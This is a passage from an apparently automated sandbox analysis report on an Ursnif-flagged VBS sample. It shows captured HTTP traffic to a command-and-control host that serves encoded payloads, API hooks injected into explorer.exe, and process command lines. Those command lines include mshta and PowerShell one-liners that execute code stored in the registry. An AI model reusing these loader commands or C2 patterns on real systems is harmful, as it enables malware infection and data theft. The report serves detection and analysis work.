Sep 10, 2021 09:57:01.881223917 CEST | 5851 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 10 Sep 2021 07:57:01 GMT
Content-Type: application/octet-stream
Content-Length: 194718
Connection: close
Pragma: public
Accept-Ranges: bytes
Expires: 0
Cache-Control: must-revalidate, post-check=0, pre-check=0
Content-Disposition: inline; filename="613b0fcdd02ba.bin"
Strict-Transport-Security: max-age=63072000; includeSubdomains
X-Content-Type-Options: nosniff
Data Raw: 76 74 cf a8 dc 9e a3 bd 80 c4 22 74 d6 90 04 f4 7c 4e 89 f9 f5 f6 c3 41 5b bd 9a c1 75 03 9e 3d 57 c7 97 06 3e 33 1a 75 cb d2 f3 9b 82 f7 12 da 1b 73 aa 9d 83 1c 06 cc d0 bb fa 6b fe fc 69 45 21 fd 77 4d e8 65 62 93 d4 4f 54 c0 7f 4b c0 e8 bd 0a da 21 85 09 52 e0 63 30 82 6b 84 0b a5 73 0e d8 b6 0a 2f f6 82 b8 db 3a 51 f5 d1 6c 17 f8 66 f5 63 27 a8 2c fe 79 31 d3 11 a2 68 ab eb bd c6 ca 96 b7 df 24 d9 bb eb 81 ee 0f 54 d0 24 37 17 2e bd d0 90 a9 1c c7 0d aa a5 e0 95 ad 52 e0 75 84 91 a6 10 9d 81 0a 4d b4 ff 81 97 74 92 63 92 3b ae a9 ad cf 50 57 12 53 8f 24 c5 3c d5 ff c4 5c 06 b9 e4 02 71 34 b3 6a f5 02 c6 06 6d 8c 5a b2 93 69 e3 04 8d c3 27 8a b8 c8 4a 1d cd c2 0f bd 3f 7e 06 be 38 ae a8 33 f4 46 25 b7 42 e8 60 df af 0a cb 9a 44 a1 2f 47 30 4b a6 62 22 1a 9b 17 41 04 1f fe a9 a5 c2 5f 2c b8 17 b3 7e f8 a3 b1 19 c2 e2 ac 4f 23 9a 3a 3a bf c4 61 f5 b6 7d d8 d5 41 f7 c6 7d 13 a3 25 bd bd b7 45 09 64 a8 d5 8a 6a 6e 18 90 f8 15 29 9d ad e6 f7 81 c6 c1 6d 32 c6 6d 91 e1 d5 b2 11 af d7 0f ae c5 84 22 1e 0f 3d 2a 0d 19 79 94 9f 72 e4 19 30 54 53 f8 a0 51 28 95 77 e8 05 cd 58 f3 5e 79 1b 2d 75 16 31 f4 ea 58 42 da fe ad 9f 21 09 f9 67 69 cf ff c7 a6 bd 34 2a ef 9a e2 63 bf 8b 7d 44 e0 80 ea 5d fb 18 21 db 02 cf db ca 07 81 b4 3e 7a 72 00 1b 21 ff 30 31 fa d2 ce c6 9f 33 9a cd 1a 25 3c f7 05 4d c2 77 5e 4f fc 99 c8 f0 51 93 7e e9 b2 35 93 c2 cc 3e bd 22 41 3e a6 14 a2 f9 47 45 a0 94 00 2b c8 09 2c 57 1c 70 d1 fc 8b 98 bd a9 53 f3 48 aa d4 87 c8 34 d1 84 66 95 bf 45 78 59 ad 24 31 f2 22 9f 83 2e 85 ee f9 50 21 68 9f ec 2e 0f 0a 37 cc a4 dc 12 79 1e 10 12 9d 19 93 bc cf 36 df 7c 6f 25 8f bc 3a 4c 53 73 0d ae 15 56 83 9e fa 88 d5 7f 9b ee e9 dc ff 92 38 f9 91 3c bf b0 a9 0d 4a 43 73 58 68 19 46 a8 b0 e3 17 3d 9c 68 30 37 f6 84 d2 c7 37 01 33 97 44 91 e5 20 3f a7 d9 e3 c0 af b0 2a 54 8f ef ab aa 06 35 5f 5b c2 66 54 41 fd bb d8 8a 29 80 3d 5d d0 8d 84 9f 53 68 db f0 5a 42 de 57 66 fa 72 b7 72 97 f3 0f 0d 65 28 85 1c 27 e4 ff f8 ed 8c 53 c2 a4 9a ad fe 7d c9 57 1e f2 ae f2 d6 35 08 89 64 bd 41 a1 00 d8 bb 74 05 14 0c 5e ca 85 87 26 07 a5 14 0f 34 11 c2 c5 18 a1 ed ce fd da 89 22 fb f0 a7 a2 50 4a 11 f6 48 c3 b2 8a f3 91 ca 09 4a d9 01 f7 fb 10 4d a4 ed cd 67 f7 fa bf df 33 2d 23 30 89 ba 79 e8 a3 8e 23 56 d9 30 2e 33 d2 7b 11 d1 09 3f 4a 40 d9 21 e7 c3 99 10 06 48 49 e6 26 34 2f c8 84 6f b9 66 4b 96 6e 4d 8a 42 85 99 f6 5f 76 29 de 4e c0 fb 1d 3a 19 52 46 73 7a 7f e9 46 b5 05 4b 3e 44 54 27 2b d1 39 05 34 e3 7e 5b e3 e8 52 d3 26 d5 f4 0e c9 1e 3e 6f 47 1f 11 ed 46 0f 00 f0 d5 53 bd 47 1f 3e ad 02 09 9b 96 3d ce 9d cc 58 7d 5e 62 8b 69 88 05 00 61 0d b0 69 2c da a1 ec e0 02 19 38 28 c5 c3 c1 00 80 82 e8 27 0d 0c 48 62 cf b4 e4 fb fa 1e 90 42 0e d8 9a 95 7b f2 ae 5f f6 77 d3 ea f5 b8 f3 4e 21 a0 bc 9b e0 df 6e 4c 75 0c 36
Data Ascii: vt"t|NA[u=W>3uskiE!wMebOTK!Rc0ks/:Qlfc',y1h$T$7.RuMtc;PWS$<\q4jmZi'J?~83F%B`D/G0Kb"A_,~O#::a}A}%Edjn)m2m"=*yr0TSQ(wX^y-u1XB!gi4*c}D]!>zr!013%<Mw^OQ~5>"A>GE+,WpSH4fExY$1".P!h.7y6|o%:LSsV8<JCsXhF=h0773D ?*T5_[fTA)=]ShZBWfrre('S}W5dAt^&4"PJHJMg3-#0y#V0.3{?J@!HI&4/ofKnMB_v)N:RFszFK>DT'+94~[R&>oGFSG>=X}^biai,8('HbB{_wN!nLu6
Sep 10, 2021 09:57:01.881283998 CEST | 5852 | IN | Data Raw: 90 ae a9 f4 a8 ef be ce 22 ff 51 86 25 9b 45 49 f6 38 ab a0 17 81 da 96 40 7d 79 7c 81 b0 00 b6 32 cd 25 c7 b2 a3 9e e3 ed b9 d6 f1 15 6f 3e 2f c2 02 d6 80 08 1d fa e8 27 17 98 17 96 c4 37 0a 68 eb 2f ae b2 81 13 08 6b c6 f2 d0 8b 5f 7e 09 9a 08
Data Ascii: "Q%EI8@}y|2%o>/'7h/k_~0*wAZ]EC2 >3&{i+: |{65z"=*8TxOkt,GM)'Ju_cJ:`zyuE]\6UTO?UE_~'
Sep 10, 2021 09:57:01.881320000 CEST | 5853 | IN | Data Raw: b8 c2 31 4b 94 90 26 a0 e4 26 12 84 c1 9b 09 25 61 fe a0 fd 91 bf a7 1a 26 94 b9 5b 6b 55 b4 f6 ea 62 0c c5 04 75 97 20 b2 b5 66 87 2f ca a7 92 60 2c 21 84 a7 23 e1 a8 fc f7 21 29 ac 5e c2 aa f8 41 99 f8 90 d7 e3 16 e1 88 2e d0 99 61 d2 30 f4 8f
Data Ascii: 1K&&%a&[kUbu f/`,!#!)^A.a0vS4O=U }2w`zuD~!SU~JA{7UZb@'VpGaDMWUZ)ypc4fH"LocY9L
Sep 10, 2021 09:57:01.881357908 CEST | 5855 | IN | Data Raw: 8f 66 14 26 6f 0a 4c 7c 7d 3b 07 77 37 85 e5 2f eb 55 0a 37 fc 6c d5 08 f9 ca 66 39 c2 a8 e3 90 49 b9 2c 73 eb 2b f0 b0 b3 06 ac bb 49 5e 6d 49 ee fd c3 dd 83 df 48 eb fc 27 f5 1e f8 88 2c 14 1a d2 f4 9b 16 04 f1 33 a5 8b 28 c5 ed 91 ed 92 85 22
Data Ascii: f&oL|};w7/U7lf9I,s+I^mIH',3("5yoq9k'oHZ^f4)E{c#:3)UTJ[IrbhMjQYWFx&M]c<KeKD"+L]*h?R@#O.8
Sep 10, 2021 09:57:01.881395102 CEST | 5856 | IN | Data Raw: f6 42 92 7c 54 91 1b dc b2 de d8 a3 dc d6 88 e3 9c 7c 48 e7 1d f1 4c c5 33 a3 de 0b 0a 7a e9 48 f4 64 75 e9 e3 5b 85 c6 a9 56 bb 6c 9e 03 c5 94 ba a5 f0 aa 2d fe c3 d8 ab 6b c9 be 75 48 5d ca f7 05 fc e7 84 a2 d8 39 fb b2 69 11 6b dc 9d 5a eb 4e
Data Ascii: B|T|HL3zHdu[Vl-kuH]9ikZNW2dpRbM*HI4uy>Yd6kr>3?^h2_ZyX#dJ>3+*Xz;/MQVR,)`K9usZDzR5a4iXYiu!
Sep 10, 2021 09:57:01.881441116 CEST | 5857 | IN | Data Raw: 13 95 39 69 f7 3d 42 4d f2 85 6d 98 78 cd dd 3c dc 7b cc a6 dc 90 b4 bd 1a c9 1e 1a 9e ba 0f 08 85 83 71 08 ab 06 0c c0 db 07 19 ba 49 f5 13 bc 48 4f 9d cc 7b f3 3b 1e 78 fb 1a 99 c7 04 4b db 4d 65 07 b1 a8 89 d1 1d a7 b1 22 83 91 46 a3 eb 4b 09
Data Ascii: 9i=BMmx<{qIHO{;xKMe"FKd\wc|;HUQQ$@9!(JZE~d/E.*3ad#{u:DNj>yOh@ac"#8/Ub!"7yzvI['xC{HOsmZ+
Sep 10, 2021 09:57:01.881483078 CEST | 5859 | IN | Data Raw: cb 76 37 ad af d4 4b 5f 3c ad 14 bf fa 70 87 21 e1 91 5a 60 f4 09 f0 76 51 e8 fd a1 65 fc 4c ee 32 94 36 e2 42 d4 1f 40 a9 2f 89 e6 8c 6e bf 1a 75 dc b0 f3 5f 45 79 97 ee 10 0b 25 d3 18 b2 d6 9b e7 87 c4 d5 5e 5a a3 ca 83 93 ff 86 d7 17 1c 8d 5d
Data Ascii: v7K_<p!Z`vQeL26B@/nu_Ey%^Z]y|f<xW50>sDE5R#6W,p^+T#@!3Y9V23C6_"00iMs>T6[BY/
Sep 10, 2021 09:57:01.881520033 CEST | 5860 | IN | Data Raw: cb 27 c2 5e 54 d1 50 56 2e f1 f4 43 33 52 6d 04 fe c4 c5 6e d2 0f f2 79 96 89 84 7c 5d 04 88 6c 0a 58 ad 23 04 cf 77 2c 5b c9 b1 d0 03 99 9e b6 92 83 c5 dc 78 69 5c 88 43 5b 8b 94 46 c4 e5 3e e8 fc df 10 69 50 1b df 1c b4 6d 29 3d 65 42 b8 74 1e
Data Ascii: '^TPV.C3Rmny|]lX#w,[xi\C[F>iPm)=eBt ~rrpju(%bQV8aq"kOsAyBTTEP)tFoHG+k+;V'w%[`tVJoC6HFK(RoL
Sep 10, 2021 09:57:01.881557941 CEST | 5862 | IN | Data Raw: ad fd 60 50 6d 82 ae 3e 9c 22 4e ae 89 42 bb 1d 0d d9 c6 3f 9c 1e 4f 33 a6 b6 97 01 38 8e 7b ee 7b a3 1f 28 19 55 0a e8 e1 1b e6 62 cc 6f a5 1a 7b 12 d0 c6 ed ac 84 5a d4 ea af c3 30 fb cb 52 e7 ed ec 65 de 00 ff 56 57 9d 95 f0 91 e8 38 0b d2 20
Data Ascii: `Pm>"NB?O38{{(Ubo{Z0ReVW8 x%MF# ocj(l0B=9T."Xcp2kI%`d.,C&-Ja!Mie'X)6$cN$l$t^9
Sep 10, 2021 09:57:01.881597042 CEST | 5863 | IN | Data Raw: 90 18 dd 7e 29 1e f4 88 b7 57 2c e5 52 91 9b ae 93 09 61 24 b1 07 56 10 7d 3b 43 25 61 4b 35 4e 59 cd 10 3f 8d 49 ab 4c 7a 3e 9c a5 41 5a 39 d1 f2 5e 2a ff b2 68 bc 3f 81 f2 42 62 dd 33 6e cd ec 7e 9b 28 67 54 7d 27 ad b2 39 12 b5 7c 39 7f 6e 9c
Data Ascii: ~)W,Ra$V};C%aK5NY?ILz>AZ9^*h?Bb3n~(gT}'9|9nA6~E6]*ZGW(0Q2y*sm=KPG}OZIFAa;8'@>pKW2j{4/!gdv>Q)-;*
                                                        Sep 10, 2021 09:57:01.931186914 CEST5864INData Raw: 1a 24 f4 75 76 e8 bf fb 36 48 64 f4 f9 b4 63 aa 94 da 2e a0 34 29 56 b2 63 09 b3 b6 30 4e 1b e4 ad 9c ca e9 11 8e bb ab c6 b3 f3 b4 a3 21 b2 35 e4 16 29 c9 dd a7 74 52 44 cb c4 fe 43 ea b5 fa 91 a0 de aa 01 20 cb a8 9f 17 52 aa 5d 80 b3 1b 9f 6c
                                                        Data Ascii: $uv6Hdc.4)Vc0N!5)tRDC R]l&ATo!%-r<u:*5DNA@7V(E!fh;amzHA.qBOrjA=`n5:UJu=gLw^X% C1Bjck<o@6yu


                                                        Session ID: 1, Source IP: 192.168.2.5, Source Port: 49788, Destination IP: 185.251.90.253, Destination Port: 80, Process: C:\Windows\SysWOW64\rundll32.exe
                                                        Timestamp: Sep 10, 2021 09:57:02.700382948 CEST, kBytes transferred: 6053, Direction: OUT, Data:
                                                        GET /Fd_2Bpcxk2ML4o/4Yi_2FHrWiGKn0A5wFBvD/PRZfU6_2FH1DJVcW/g_2Fg_2F20KxTzq/sMEmuitPFPfj3EtNRD/SA_2FG4XJ/mT_2B9htxgpCM5Sw9dFG/0GOk5wMqEe7jZlQfLGf/mA_2FWhN50DkjSdhxWei_2/FhXBykIpEOclO/crxsB5_2/Ble8n4SiH0d5h4j9OhpB9W8/f7cJNH55_2/BDWX6KOpdls6GJZSC/G_2FbiyNPy_2/FypUL6okzx_/2FAWJjZB1eiGHh/hrIz0_2B7QDXJAzjWHaMR/znK_2FKxXJtI3gHn/_2FediiSJLPcwpE/ATZTCB8xbMUZrLNlLv/_2BOkapjZ/jvpLjf9IYNZ6/RyT HTTP/1.1
                                                        Cache-Control: no-cache
                                                        Connection: Keep-Alive
                                                        Pragma: no-cache
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0
                                                        Host: atl.bigbigpoppa.com
                                                        Timestamp: Sep 10, 2021 09:57:03.196911097 CEST, kBytes transferred: 6054, Direction: IN, Data:
                                                        HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Fri, 10 Sep 2021 07:57:03 GMT
                                                        Content-Type: application/octet-stream
                                                        Content-Length: 247965
                                                        Connection: close
                                                        Pragma: public
                                                        Accept-Ranges: bytes
                                                        Expires: 0
                                                        Cache-Control: must-revalidate, post-check=0, pre-check=0
                                                        Content-Disposition: inline; filename="613b0fcf29415.bin"
                                                        Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                        X-Content-Type-Options: nosniff


                                                        Session ID: 2, Source IP: 192.168.2.5, Source Port: 49789, Destination IP: 185.251.90.253, Destination Port: 80, Process: C:\Windows\SysWOW64\rundll32.exe
                                                        Timestamp: Sep 10, 2021 09:57:03.803296089 CEST, kBytes transferred: 6310, Direction: OUT, Data:
                                                        GET /ip_2B0cVuBTOjpbo/BZT_2FEcZD79y2H/f3wS9_2BbAkX3nftyB/uQG5JIxM3/hkTHWn_2F_2BpOIsZCFn/4kLDBNiVWLvnXfwIKVW/_2B0IsHxbOfD1ufcXkPjJo/EpDoUxcMaWCn1/8Cn5O7LC/eCiAOLLPPUL3E_2BUmdr0wu/7S9z8dGBsB/5jo94woog9YMCzFYk/vxvIpoLH3pVt/RLdRfO7DC2t/yTMvjyOY5hDeBN/auRC60Y4xtz4V1KDXQP2K/Ose2dfWgeEs0tX4x/hD9nLBJRnyryDU3/xZZDK1S2EJHUeFDAor/G09c8MwYv/_2Fz2PGThD9ITT_2BYVA/tVMCZqyJgK7/e HTTP/1.1
                                                        Cache-Control: no-cache
                                                        Connection: Keep-Alive
                                                        Pragma: no-cache
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0
                                                        Host: atl.bigbigpoppa.com
                                                        Timestamp: Sep 10, 2021 09:57:04.265120983 CEST, kBytes transferred: 6312, Direction: IN, Data:
                                                        HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Fri, 10 Sep 2021 07:57:04 GMT
                                                        Content-Type: application/octet-stream
                                                        Content-Length: 1958
                                                        Connection: close
                                                        Pragma: public
                                                        Accept-Ranges: bytes
                                                        Expires: 0
                                                        Cache-Control: must-revalidate, post-check=0, pre-check=0
                                                        Content-Disposition: inline; filename="613b0fd038f90.bin"
                                                        Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                        X-Content-Type-Options: nosniff


                                                        Code Manipulations

                                                        User Modules

                                                        Hook Summary

                                                        • Function Name: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW, Hook Type: IAT, Active in Processes: explorer.exe
                                                        • Function Name: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW, Hook Type: IAT, Active in Processes: explorer.exe
                                                        • Function Name: CreateProcessAsUserW, Hook Type: EAT, Active in Processes: explorer.exe
                                                        • Function Name: CreateProcessAsUserW, Hook Type: INLINE, Active in Processes: explorer.exe
                                                        • Function Name: CreateProcessW, Hook Type: EAT, Active in Processes: explorer.exe
                                                        • Function Name: CreateProcessW, Hook Type: INLINE, Active in Processes: explorer.exe
                                                        • Function Name: CreateProcessA, Hook Type: EAT, Active in Processes: explorer.exe
                                                        • Function Name: CreateProcessA, Hook Type: INLINE, Active in Processes: explorer.exe

                                                        Processes

                                                        Process: explorer.exe, Module: WININET.dll
                                                        • Function Name: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW, Hook Type: IAT, New Data: 7FFA9B335200
                                                        • Function Name: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW, Hook Type: IAT, New Data: 66C777C
                                                        Process: explorer.exe, Module: user32.dll
                                                        • Function Name: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW, Hook Type: IAT, New Data: 7FFA9B335200
                                                        • Function Name: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW, Hook Type: IAT, New Data: 66C777C
                                                        Process: explorer.exe, Module: KERNEL32.DLL
                                                        • Function Name: CreateProcessAsUserW, Hook Type: EAT, New Data: 7FFA9B33521C
                                                        • Function Name: CreateProcessAsUserW, Hook Type: INLINE, New Data: 0xFF 0xF2 0x25 0x50 0x00 0x00
                                                        • Function Name: CreateProcessW, Hook Type: EAT, New Data: 7FFA9B335200
                                                        • Function Name: CreateProcessW, Hook Type: INLINE, New Data: 0xFF 0xF2 0x25 0x50 0x00 0x00
                                                        • Function Name: CreateProcessA, Hook Type: EAT, New Data: 7FFA9B33520E
                                                        • Function Name: CreateProcessA, Hook Type: INLINE, New Data: 0xFF 0xF2 0x25 0x50 0x00 0x00

                                                        Statistics

                                                        CPU Usage


                                                        Memory Usage


                                                        High Level Behavior Distribution


                                                        Behavior


                                                        System Behavior

                                                        General

                                                        Start time:09:53:59
                                                        Start date:10/09/2021
                                                        Path:C:\Windows\System32\wscript.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\345678.vbs'
                                                        Imagebase:0x7ff695db0000
                                                        File size:163840 bytes
                                                        MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Start time:09:56:21
                                                        Start date:10/09/2021
                                                        Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                        Imagebase:0x7ff6276c0000
                                                        File size:488448 bytes
                                                        MD5 hash:A782A4ED336750D10B3CAF776AFE8E70
                                                        Has elevated privileges:true
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate

                                                        General

                                                        Start time:09:56:22
                                                        Start date:10/09/2021
                                                        Path:C:\Windows\System32\rundll32.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
                                                        Imagebase:0x7ff616d10000
                                                        File size:69632 bytes
                                                        MD5 hash:73C519F050C20580F8A62C849D49215A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Start time:09:56:22
                                                        Start date:10/09/2021
                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
                                                        Imagebase:0xf60000
                                                        File size:61952 bytes
                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000015.00000003.674925950.00000000059B8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000015.00000003.614926356.00000000051B8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000015.00000003.615093761.00000000051B8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000015.00000003.615032567.00000000051B8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000015.00000003.615070826.00000000051B8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000015.00000003.622629289.0000000004FBC000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000015.00000003.620983509.0000000005139000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000015.00000002.741515734.0000000004E3F000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000015.00000003.615054259.00000000051B8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000015.00000003.615001343.00000000051B8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000015.00000003.615108911.00000000051B8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000015.00000003.614962724.00000000051B8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000015.00000003.618072747.00000000051B8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000015.00000003.620941677.00000000050BA000.00000004.00000040.sdmp, Author: Joe Security
                                                        Reputation:high

                                                        General

                                                        Start time:09:56:59
                                                        Start date:10/09/2021
                                                        Path:C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
                                                        Imagebase:0x910000
                                                        File size:426496 bytes
                                                        MD5 hash:7AB59579BA91115872D6E51C54B9133B
                                                        Has elevated privileges:true
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate

                                                        General

                                                        Start time:09:57:06
                                                        Start date:10/09/2021
                                                        Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                        Imagebase:0x7ff6276c0000
                                                        File size:488448 bytes
                                                        MD5 hash:A782A4ED336750D10B3CAF776AFE8E70
                                                        Has elevated privileges:true
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate

                                                        General

                                                        Start time:09:57:07
                                                        Start date:10/09/2021
                                                        Path:C:\Windows\System32\mshta.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Rm6e='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Rm6e).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
                                                        Imagebase:0x7ff644970000
                                                        File size:14848 bytes
                                                        MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate

                                                        General

                                                        Start time:09:57:09
                                                        Start date:10/09/2021
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                                                        Imagebase:0x7ff617cb0000
                                                        File size:447488 bytes
                                                        MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 0000001F.00000002.742621606.000002174F3D0000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 0000001F.00000002.781275414.000002175F5E8000.00000004.00000001.sdmp, Author: Joe Security
                                                        Reputation:high

                                                        General

                                                        Start time:09:57:09
                                                        Start date:10/09/2021
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7ecfc0000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Start time:09:57:17
                                                        Start date:10/09/2021
                                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.cmdline'
                                                        Imagebase:0x7ff6c8550000
                                                        File size:2739304 bytes
                                                        MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Reputation:moderate

                                                        General

                                                        Start time:09:57:18
                                                        Start date:10/09/2021
                                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES36.tmp' 'c:\Users\user\AppData\Local\Temp\uitt4j30\CSC1FA535E1192D4199A0DB18CBAD2D0A9.TMP'
                                                        Imagebase:0x7ff69ad30000
                                                        File size:47280 bytes
                                                        MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate

                                                        General

                                                        Start time:09:57:20
                                                        Start date:10/09/2021
                                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wyozc5bn\wyozc5bn.cmdline'
                                                        Imagebase:0x7ff6c8550000
                                                        File size:2739304 bytes
                                                        MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET

                                                        General

                                                        Start time:09:57:21
                                                        Start date:10/09/2021
                                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESCC9.tmp' 'c:\Users\user\AppData\Local\Temp\wyozc5bn\CSC8A734EFC87854564869CBAF05337FE1.TMP'
                                                        Imagebase:0x7ff69ad30000
                                                        File size:47280 bytes
                                                        MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Start time:09:57:28
                                                        Start date:10/09/2021
                                                        Path:C:\Windows\explorer.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\Explorer.EXE
                                                        Imagebase:0x7ff693d90000
                                                        File size:3933184 bytes
                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Start time:09:57:28
                                                        Start date:10/09/2021
                                                        Path:C:\Windows\System32\control.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\control.exe -h
                                                        Imagebase:0x7ff64dbb0000
                                                        File size:117760 bytes
                                                        MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
